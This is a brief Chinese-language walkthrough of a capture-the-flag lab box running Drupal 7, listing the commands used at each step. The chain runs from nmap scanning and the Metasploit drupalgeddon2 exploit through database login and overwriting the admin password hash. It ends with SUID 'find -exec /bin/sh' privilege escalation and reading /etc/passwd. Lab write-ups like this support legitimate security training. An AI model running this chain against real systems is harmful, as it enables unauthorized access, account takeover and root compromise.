1.在kali中输入ifconfig查看网段
Ip为:192.168.126.129
网段:192.168.126.0
2.使用nmap扫描网段:
nmap -sP 192.168.126.0/24
对该地址扫描
nmap -sV 192.168.126.133
发现80端口开放;
3.根据ip地址访问游览器
由左下角知该网页基于Drupal, 并且为drupal7
启动Metersploit:msfconsole
用search 命令查找与Drupal 有关的漏洞:search Drupal
选取2018的进行测试,因为有远程代码执行漏洞:
use exploit/unix/webapp/drupal_drupalgeddon2
Set RHOSTS 192.168.126.133
Run
列出文件列表,发现flag1.txt文件:
查看flag1.txt
Cat flag1.txt
4.百度搜索Drupal默认的文件路径:
cd sites
cd /default
cd default
ls
5.需要用到反弹shell
python -c 'import pty; pty.spawn("/bin/bash")'
mysql -udbuser -pR0ck3t
show databases;
use drupaldb
show tables;
select * from users;
由于密码为hash值,无法破解,因此选择将密码进行更改:
quit
cd /var/www
php scripts/password-hash.sh 123
update users set pass="$S$DHFOxgrwZAQ1QCjgXzM2XlqoNxKKLOqs2hK23.N9lNZV.OLuCIL2" where uid=1;
6.使用firefox登录网站;
进入网页登录,登陆后点击dashboard, 发现flag3
7.cat /etc/passwd
cat /home/flag4
cd /home/flag4
ls
查看flag4文件后发现需要进行提权操作
find / -perm -u=s -type f2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -name flag4.txt -exec "/bin/sh" \;
whoami
cd /root
ls
cat thefinalflag.txt